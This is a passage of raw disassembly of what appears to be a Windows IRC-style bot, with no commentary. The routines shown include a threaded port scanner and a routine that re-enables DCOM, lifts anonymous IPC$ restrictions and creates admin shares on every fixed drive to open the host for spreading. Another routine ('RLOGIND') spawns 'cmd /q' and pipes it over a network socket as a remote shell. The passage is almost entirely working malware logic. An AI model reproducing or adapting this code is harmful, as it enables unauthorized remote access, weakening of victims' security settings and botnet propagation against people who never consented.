call off_42C310[eax*4]
pop ecx
loc_40FD7A: ; CODE XREF: sub_40FD06+64�j
cmp [ebp+arg_8], 0
pop edi
pop esi
pop ebx
jz short loc_40FD8E
push [ebp+arg_0]
call sub_40FC65
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FD8E: ; CODE XREF: sub_40FD06+7B�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40FD06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40FD93 proc near ; DATA XREF: sub_40FE55+77�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0B8h
mov eax, [ebp+74h+arg_0]
push esi
push edi
mov esi, eax
push 2Ah
pop ecx
lea edi, [ebp+74h+var_B8]
rep movsd
push [ebp+74h+var_34]
xor esi, esi
inc esi
mov [eax+0A4h], esi
xor eax, eax
lea edi, [ebp+74h+var_10]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_10], 2
call dword_435934 ; ntohs
push 6
mov [ebp+74h+var_E], ax
mov eax, [ebp+74h+var_28]
push esi
push 2
mov [ebp+74h+var_C], eax
call dword_4357E8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40FE43
push 10h
lea eax, [ebp+74h+var_10]
push eax
push esi
call dword_4357A0 ; connect
mov ecx, [ebp+74h+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_43668C[ecx], esi
jz short loc_40FE43
push [ebp+74h+var_34]
push [ebp+74h+var_28]
call dword_435868 ; inet_ntoa
push eax
push offset aScanIpSPortD_0 ; "[SCAN]: IP: %s Port: %d is open."
mov edi, offset dword_47BF60
push edi
call sub_4145E5
push 0
push [ebp+74h+var_20]
lea eax, [ebp+74h+var_B4]
push edi
push eax
push [ebp+74h+var_B8]
call sub_4056FB
push edi
call sub_401EFF
add esp, 28h
loc_40FE43: ; CODE XREF: sub_40FD93+55�j
; sub_40FD93+76�j
push esi
call dword_4358F4 ; closesocket
pop edi
xor eax, eax
pop esi
add ebp, 74h
leave
retn 4
sub_40FD93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_40FE55 proc near ; DATA XREF: sub_408A18+267B�o
var_12C = byte ptr -12Ch
var_AC = byte ptr -0ACh
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 12Ch
push ebx
mov ebx, [ebp+74h+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, ebx
lea edi, [ebp+74h+var_AC]
rep movsd
mov esi, ds:dword_420000
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_40FE82: ; CODE XREF: sub_40FE55+C1�j
push [ebp+74h+var_28]
push [ebp+74h+var_1C]
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_12C]
push offset aScanScanningIp ; "[SCAN]: Scanning IP: %s, Port: %d."
push eax
call sub_4145E5
push 1FFh
lea eax, [ebp+74h+var_12C]
push eax
mov eax, [ebp+74h+var_20]
imul eax, 234h
add eax, offset dword_436480
push eax
call sub_414670
add esp, 1Ch
lea eax, [ebp+74h+var_4]
push eax
push edi
lea eax, [ebp+74h+var_AC]
push eax
push offset sub_40FD93
push edi
push edi
call ds:dword_42000C ; CreateThread
cmp eax, edi
mov [ebp+74h+arg_0], eax
jz short loc_40FEEB
jmp short loc_40FEE6
; ---------------------------------------------------------------------------
loc_40FEE2: ; CODE XREF: sub_40FE55+94�j
push 32h
call esi ; Sleep
loc_40FEE6: ; CODE XREF: sub_40FE55+8B�j
cmp [ebp+74h+var_8], edi
jz short loc_40FEE2
loc_40FEEB: ; CODE XREF: sub_40FE55+89�j
push [ebp+74h+arg_0]
call ds:dword_42003C ; CloseHandle
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
push [ebp+74h+var_1C]
call dword_4358B8 ; ntohl
inc eax
push eax
call dword_43590C ; ntohl
mov [ebp+74h+var_1C], eax
jmp loc_40FE82
sub_40FE55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF1B proc near ; CODE XREF: sub_41055B+8�p
; sub_410579+37�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_435948, edi
jnz loc_41004E
lea eax, [ebp+var_4]
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_435910 ; RegOpenKeyExA
test eax, eax
jnz short loc_40FFA7
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 4Eh
lea edx, [eax+1]
loc_40FF5F: ; CODE XREF: sub_40FF1B+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40FF5F
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4357CC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_40FF8F
push offset aSecureDisableD ; "[SECURE]: Disable DCOM failed."
jmp short loc_40FF94
; ---------------------------------------------------------------------------
loc_40FF8F: ; CODE XREF: sub_40FF1B+6B�j
push offset aSecureDcomDisa ; "[SECURE]: DCOM disabled."
loc_40FF94: ; CODE XREF: sub_40FF1B+72�j
push eax
call sub_4145E5
pop ecx
pop ecx
push [ebp+var_4]
call dword_4358C4 ; RegCloseKey
jmp short loc_40FFBA
; ---------------------------------------------------------------------------
loc_40FFA7: ; CODE XREF: sub_40FF1B+36�j
lea eax, [ebp+var_214]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_4145E5
pop ecx
pop ecx
loc_40FFBA: ; CODE XREF: sub_40FF1B+8A�j
cmp [ebp+arg_C], edi
jnz short loc_40FFD9
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_40FFD9: ; CODE XREF: sub_40FF1B+A2�j
lea eax, [ebp+var_214]
push eax
call sub_401EFF
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_435910 ; RegOpenKeyExA
test eax, eax
jnz short loc_410047
push 4
lea eax, [ebp+var_8]
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_4357CC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_41002F
push offset aSecureFailed_1 ; "[SECURE]: Failed to restrict access to "...
jmp short loc_410034
; ---------------------------------------------------------------------------
loc_41002F: ; CODE XREF: sub_40FF1B+10B�j
push offset aSecureRestrict ; "[SECURE]: Restricted access to the IPC$"...
loc_410034: ; CODE XREF: sub_40FF1B+112�j
push eax
call sub_4145E5
pop ecx
pop ecx
push [ebp+var_4]
call dword_4358C4 ; RegCloseKey
jmp short loc_410061
; ---------------------------------------------------------------------------
loc_410047: ; CODE XREF: sub_40FF1B+E3�j
push offset aSecureFailed_2 ; "[SECURE]: Failed to open IPC$ Restricti"...
jmp short loc_410053
; ---------------------------------------------------------------------------
loc_41004E: ; CODE XREF: sub_40FF1B+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_410053: ; CODE XREF: sub_40FF1B+131�j
lea eax, [ebp+var_214]
push eax
call sub_4145E5
pop ecx
pop ecx
loc_410061: ; CODE XREF: sub_40FF1B+12A�j
cmp [ebp+arg_C], edi
jnz short loc_410080
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_410080: ; CODE XREF: sub_40FF1B+149�j
lea eax, [ebp+var_214]
push eax
call sub_401EFF
cmp dword_435970, edi
pop ecx
jnz loc_4101FD
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
push ebx
loc_4100A3: ; CODE XREF: sub_40FF1B+2C6�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push edi
call dword_4358E8
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_410142
cmp eax, 0EAh
jz short loc_410142
xor esi, esi
loc_4100D1: ; CODE XREF: sub_40FF1B+220�j
push off_42C368[esi]
push edi
call sub_407150
pop ecx
pop ecx
push off_42C368[esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_4100F6
push offset aSecureShareSDe ; "[SECURE]: Share '%s' deleted."
jmp short loc_4100FB
; ---------------------------------------------------------------------------
loc_4100F6: ; CODE XREF: sub_40FF1B+1D2�j
push offset aSecureFailed_3 ; "[SECURE]: Failed to delete '%s' share."
loc_4100FB: ; CODE XREF: sub_40FF1B+1D9�j
push 200h
push eax
call sub_41483D
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_410128
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_410128: ; CODE XREF: sub_40FF1B+1F1�j
lea eax, [ebp+var_214]
push eax
call sub_401EFF
add esi, 8
cmp esi, 20h
pop ecx
jb short loc_4100D1
jmp loc_4101DA
; ---------------------------------------------------------------------------
loc_410142: ; CODE XREF: sub_40FF1B+1AB�j
; sub_40FF1B+1B2�j
mov esi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+var_4], ebx
jb loc_4101D1
loc_410151: ; CODE XREF: sub_40FF1B+2B2�j
mov edi, [esi]
push edi
call sub_415B4E
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_4101C6
push edi
call sub_407064
push eax
push 0
call sub_407150
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_410186
push offset aSecureShareS_0 ; "[SECURE]: Share '%S' deleted."
jmp short loc_41018B
; ---------------------------------------------------------------------------
loc_410186: ; CODE XREF: sub_40FF1B+262�j
push offset aSecureFailed_4 ; "[SECURE]: Failed to delete '%S' share."
loc_41018B: ; CODE XREF: sub_40FF1B+269�j
push 200h
push eax
call sub_41483D
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_4101B9
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_4101B9: ; CODE XREF: sub_40FF1B+282�j
lea eax, [ebp+var_214]
push eax
call sub_401EFF
pop ecx
loc_4101C6: ; CODE XREF: sub_40FF1B+245�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_410151
xor edi, edi
loc_4101D1: ; CODE XREF: sub_40FF1B+230�j
push [ebp+var_8]
call dword_435820
loc_4101DA: ; CODE XREF: sub_40FF1B+222�j
cmp [ebp+var_10], 0EAh
jz loc_4100A3
lea eax, [ebp+var_214]
push offset aSecureNetworkS ; "[SECURE]: Network shares deleted."
push eax
call sub_4145E5
pop ecx
pop ecx
pop ebx
jmp short loc_410210
; ---------------------------------------------------------------------------
loc_4101FD: ; CODE XREF: sub_40FF1B+178�j
lea eax, [ebp+var_214]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_4145E5
pop ecx
pop ecx
loc_410210: ; CODE XREF: sub_40FF1B+2E0�j
cmp [ebp+arg_C], edi
jnz short loc_41022E
push edi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_41022E: ; CODE XREF: sub_40FF1B+2F8�j
lea eax, [ebp+var_214]
push eax
call sub_401EFF
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_40FF1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410242 proc near ; CODE XREF: sub_410579:loc_4105B7�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_435948, ebx
push esi
jnz loc_410371
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_435910 ; RegOpenKeyExA
test eax, eax
jnz short loc_4102CE
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 59h
lea edx, [eax+1]
loc_410286: ; CODE XREF: sub_410242+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_410286
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4357CC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_4102B6
push offset aSecureEnableDc ; "[SECURE]: Enable DCOM failed."
jmp short loc_4102BB
; ---------------------------------------------------------------------------
loc_4102B6: ; CODE XREF: sub_410242+6B�j
push offset aSecureDcomEnab ; "[SECURE]: DCOM enabled."
loc_4102BB: ; CODE XREF: sub_410242+72�j
push eax
call sub_4145E5
pop ecx
pop ecx
push [ebp+var_4]
call dword_4358C4 ; RegCloseKey
jmp short loc_4102E1
; ---------------------------------------------------------------------------
loc_4102CE: ; CODE XREF: sub_410242+36�j
lea eax, [ebp+var_220]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_4145E5
pop ecx
pop ecx
loc_4102E1: ; CODE XREF: sub_410242+8A�j
cmp [ebp+arg_C], ebx
jnz short loc_410300
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_410300: ; CODE XREF: sub_410242+A2�j
lea eax, [ebp+var_220]
push eax
call sub_401EFF
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_435910 ; RegOpenKeyExA
test eax, eax
jnz short loc_41036A
push 4
lea eax, [ebp+var_8]
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call dword_4357CC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_410352
push offset aSecureFailed_5 ; "[SECURE]: Failed to unrestrict access t"...
jmp short loc_410357
; ---------------------------------------------------------------------------
loc_410352: ; CODE XREF: sub_410242+107�j
push offset aSecureUnrestri ; "[SECURE]: Unrestricted access to the IP"...
loc_410357: ; CODE XREF: sub_410242+10E�j
push eax
call sub_4145E5
pop ecx
pop ecx
push [ebp+var_4]
call dword_4358C4 ; RegCloseKey
jmp short loc_410384
; ---------------------------------------------------------------------------
loc_41036A: ; CODE XREF: sub_410242+E3�j
push offset aSecureFailed_6 ; "[SECURE]: Failed to open IPC$ restricti"...
jmp short loc_410376
; ---------------------------------------------------------------------------
loc_410371: ; CODE XREF: sub_410242+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_410376: ; CODE XREF: sub_410242+12D�j
lea eax, [ebp+var_220]
push eax
call sub_4145E5
pop ecx
pop ecx
loc_410384: ; CODE XREF: sub_410242+126�j
cmp [ebp+arg_C], ebx
jnz short loc_4103A3
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_4103A3: ; CODE XREF: sub_410242+145�j
lea eax, [ebp+var_220]
push eax
call sub_401EFF
cmp dword_435970, ebx
pop ecx
jnz loc_410516
push edi
xor esi, esi
mov edi, 200h
loc_4103C4: ; CODE XREF: sub_410242+1EF�j
push dword_42C36C[esi]
push off_42C368[esi]
push ebx
call sub_4070E5
add esp, 0Ch
push off_42C368[esi]
test eax, eax
lea eax, [ebp+var_220]
jnz short loc_4103F0
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_4103F5
; ---------------------------------------------------------------------------
loc_4103F0: ; CODE XREF: sub_410242+1A5�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_4103F5: ; CODE XREF: sub_410242+1AC�j
push edi
push eax
call sub_41483D
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_41041E
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_41041E: ; CODE XREF: sub_410242+1C0�j
lea eax, [ebp+var_220]
push eax
call sub_401EFF
add esi, 8
cmp esi, 10h
pop ecx
jb short loc_4103C4
call ds:dword_420124 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_4104FE
loc_410446: ; CODE XREF: sub_410242+2B6�j
test byte ptr [ebp+var_4], 1
jz loc_4104F3
cmp bl, 41h
jz loc_4104F3
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_41483D
push esi
push offset aC_0 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_41483D
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_435774 ; GetDriveTypeA
cmp eax, 3
jnz short loc_4104F3
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_4070E5
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_220]
jnz short loc_4104B7
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_4104BC
; ---------------------------------------------------------------------------
loc_4104B7: ; CODE XREF: sub_410242+26C�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_4104BC: ; CODE XREF: sub_410242+273�j
push edi
push eax
call sub_41483D
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_4104E6
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_4104E6: ; CODE XREF: sub_410242+288�j
lea eax, [ebp+var_220]
push eax
call sub_401EFF
pop ecx
loc_4104F3: ; CODE XREF: sub_410242+208�j
; sub_410242+211�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_410446
loc_4104FE: ; CODE XREF: sub_410242+1FE�j
lea eax, [ebp+var_220]
push offset aSecureNetwor_0 ; "[SECURE]: Network shares added."
push eax
call sub_4145E5
pop ecx
pop ecx
xor ebx, ebx
pop edi
jmp short loc_410529
; ---------------------------------------------------------------------------
loc_410516: ; CODE XREF: sub_410242+174�j
lea eax, [ebp+var_220]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_4145E5
pop ecx
pop ecx
loc_410529: ; CODE XREF: sub_410242+2D2�j
cmp [ebp+arg_C], ebx
jnz short loc_410547
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_410547: ; CODE XREF: sub_410242+2EA�j
lea eax, [ebp+var_220]
push eax
call sub_401EFF
pop ecx
xor eax, eax
pop esi
inc eax
pop ebx
leave
retn
sub_410242 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_41055B proc near ; CODE XREF: sub_41055B+1C�j
; DATA XREF: sub_40E745+3B4�o
push 1
push 0
push 0
push 0
call sub_40FF1B
add esp, 10h
push dword_42C364
call ds:dword_420000 ; Sleep
jmp short sub_41055B
sub_41055B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_410579 proc near ; DATA XREF: sub_408A18+4ECC�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
cmp [ebp+74h+var_10], 0
push [ebp+74h+var_8]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
jz short loc_4105B7
call sub_40FF1B
jmp short loc_4105BC
; ---------------------------------------------------------------------------
loc_4105B7: ; CODE XREF: sub_410579+35�j
call sub_410242
loc_4105BC: ; CODE XREF: sub_410579+3C�j
add esp, 10h
push [ebp+74h+var_14]
call sub_412735
pop ecx
push 0
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_410579 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105D1 proc near ; CODE XREF: sub_41084F+98�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push esi
push edi
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_58]
rep stosd
lea edi, [ebp+var_14]
stosd
xor esi, esi
stosd
stosd
stosd
mov eax, [ebp+arg_0]
mov edi, ds:dword_4200E0
push esi
push 1
mov [ebp+var_20], eax
push 2
lea eax, [ebp+var_18]
push eax
mov [ebp+var_4], esi
mov [ebp+var_58], 44h
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_420110 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_420038 ; CreateProcessA
test eax, eax
jz short loc_410681
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_436688[eax], ecx
call ds:dword_42003C ; CloseHandle
jmp short loc_410697
; ---------------------------------------------------------------------------
loc_410681: ; CODE XREF: sub_4105D1+8E�j
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_2 ; "[RLOGIND]: Failed to execute shell, err"...
call sub_401F73
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_410697: ; CODE XREF: sub_4105D1+AE�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_4105D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41069D proc near ; DATA XREF: sub_41094B+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 1B0h
push ebx
mov ebx, ds:dword_42008C
push esi
push edi
mov edi, [ebp+74h+arg_0]
jmp short loc_4106FF
; ---------------------------------------------------------------------------
loc_4106B6: ; CODE XREF: sub_41069D+77�j
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+74h+arg_0], eax
jbe short loc_4106E8
loc_4106C1: ; CODE XREF: sub_41069D+49�j
mov cl, [ebp+esi+74h+var_C8]
cmp cl, 0Ah
jnz short loc_4106D8
cmp dl, 0Dh
jz short loc_4106D8
mov [ebp+eax+74h+var_1B0], 0Dh
inc eax
loc_4106D8: ; CODE XREF: sub_41069D+2B�j
; sub_41069D+30�j
mov [ebp+eax+74h+var_1B0], cl
inc eax
inc esi
cmp esi, [ebp+74h+arg_0]
mov dl, cl
jb short loc_4106C1
loc_4106E8: ; CODE XREF: sub_41069D+22�j
push 0
push eax
lea eax, [ebp+74h+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_43587C ; send
test eax, eax
jle short loc_410716
loc_4106FF: ; CODE XREF: sub_41069D+17�j
push 0
lea eax, [ebp+74h+arg_0]
push eax
push 0C8h
lea eax, [ebp+74h+var_C8]
push eax
push dword ptr [edi]
call ebx ; ReadFile
test eax, eax
jnz short loc_4106B6
loc_410716: ; CODE XREF: sub_41069D+60�j
mov esi, ds:dword_420008
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_410732
call esi ; RtlGetLastWin32Error
push eax
push offset aRlogindSession ; "[RLOGIND]: SessionReadShellThread exite"...
call sub_401F73
pop ecx
pop ecx
loc_410732: ; CODE XREF: sub_41069D+84�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_41069D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41073A proc near ; DATA XREF: sub_41094B+75�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+74h+arg_0]
xor esi, esi
mov [ebp+74h+var_10], ebx
jmp loc_41082C
; ---------------------------------------------------------------------------
loc_410757: ; CODE XREF: sub_41073A+107�j
cmp [ebp+74h+var_10], ebx
jbe short loc_410764
dec [ebp+74h+var_10]
jmp loc_41082F
; ---------------------------------------------------------------------------
loc_410764: ; CODE XREF: sub_41073A+20�j
mov al, byte ptr [ebp+74h+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_410817
cmp al, 8
mov [ebp+74h+var_C], ebx
jz short loc_4107CE
cmp al, 7Fh
jz short loc_4107CE
cmp al, 3
jnz short loc_41078F
push ebx
push ebx
call ds:dword_420128 ; GenerateConsoleCtrlEvent
jmp short loc_4107F5
; ---------------------------------------------------------------------------
loc_41078F: ; CODE XREF: sub_41073A+49�j
cmp al, 15h
jnz short loc_4107B1
xor esi, esi
mov [ebp+74h+var_8], 20h
mov [ebp+74h+var_7], 58h
mov [ebp+74h+var_6], 58h
mov [ebp+74h+var_5], 58h
mov [ebp+74h+var_4], 0Dh
mov [ebp+74h+var_3], 0Ah
push 6
jmp short loc_4107E1
; ---------------------------------------------------------------------------
loc_4107B1: ; CODE XREF: sub_41073A+57�j
xor ecx, ecx
mov [ebp+esi+74h+var_DC], al
inc esi
inc ecx
cmp al, 0Dh
mov [ebp+74h+var_8], al
jnz short loc_4107E2
mov [ebp+esi+74h+var_DC], 0Ah
mov [ebp+74h+var_7], 0Ah
inc esi
push 2
jmp short loc_4107E1
; ---------------------------------------------------------------------------
loc_4107CE: ; CODE XREF: sub_41073A+41�j
; sub_41073A+45�j
cmp esi, ebx
jbe short loc_4107F8
dec esi
mov [ebp+74h+var_8], 8
mov [ebp+74h+var_7], 20h
mov [ebp+74h+var_6], 8
push 3
loc_4107E1: ; CODE XREF: sub_41073A+75�j
; sub_41073A+92�j
pop ecx
loc_4107E2: ; CODE XREF: sub_41073A+84�j
push ebx
push ecx
lea eax, [ebp+74h+var_8]
push eax
push dword ptr [edi+0Ch]
call dword_43587C ; send
test eax, eax
jle short loc_410847
loc_4107F5: ; CODE XREF: sub_41073A+53�j
mov al, byte ptr [ebp+74h+arg_0+3]
loc_4107F8: ; CODE XREF: sub_41073A+96�j
cmp al, 0Dh
jnz short loc_41082F
push ebx
lea eax, [ebp+74h+var_14]
push eax
push esi
lea eax, [ebp+74h+var_DC]
push eax
push dword ptr [edi+4]
call ds:dword_420040 ; WriteFile
test eax, eax
jz short loc_410847
xor esi, esi
jmp short loc_41082F
; ---------------------------------------------------------------------------
loc_410817: ; CODE XREF: sub_41073A+36�j
cmp [ebp+74h+var_C], ebx
jnz short loc_410825
mov [ebp+74h+var_C], 1
jmp short loc_41082F
; ---------------------------------------------------------------------------
loc_410825: ; CODE XREF: sub_41073A+E0�j
mov [ebp+74h+var_10], 0Ah
loc_41082C: ; CODE XREF: sub_41073A+18�j
